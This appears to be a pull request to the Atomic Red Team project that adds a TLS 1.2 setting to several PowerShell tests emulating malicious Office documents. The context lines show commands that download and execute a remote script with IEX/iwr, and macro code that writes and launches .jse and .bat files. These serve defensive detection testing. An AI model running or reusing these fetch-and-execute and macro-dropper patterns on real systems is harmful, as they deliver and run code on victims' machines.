### PR TITLE
Update T1204.002.md

### DIFF
--- a/atomics/T1204.002/T1204.002.md
+++ b/atomics/T1204.002/T1204.002.md
@@ -50,6 +50,7 @@ References:
 
 
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
 $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"cscript.exe #{jse_path}`"`n"
 Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
@@ -138,6 +139,7 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
 
 
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
 $macrocode = "  a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
 Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
@@ -188,6 +190,7 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
 
 
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
 $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
 Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
@@ -237,6 +240,7 @@ Microsoft Office creating then launching a .bat script from an AppData directory
 
 
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
 $macrocode = "   Open `"#{bat_path}`" For Output As #1`n   Write #1, `"calc.exe`"`n   Close #1`n   a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
 Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
@@ -390,6 +394,7 @@ and pull down the script and execute it. By default the payload will execute cal
 
 
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
 Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
 ```


### PR DESCRIPTION
Added lines to each test using IWR for invoke-webrequest to set the acceptable TLS versions for the commands to complete successfully by prepending the tests with 

```[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12```

**Details:**
without modifying the accepted security protocols to accept TLS12, the iwi commands will fail with a message stating:
"iwr : The request was aborted: Could not create SSL/TLS secure channel."

**Testing:**
running the iwi commands after running the commands to modify the allowed security protocol types the commands complete without the protocol error

**Associated Issues:**
n/a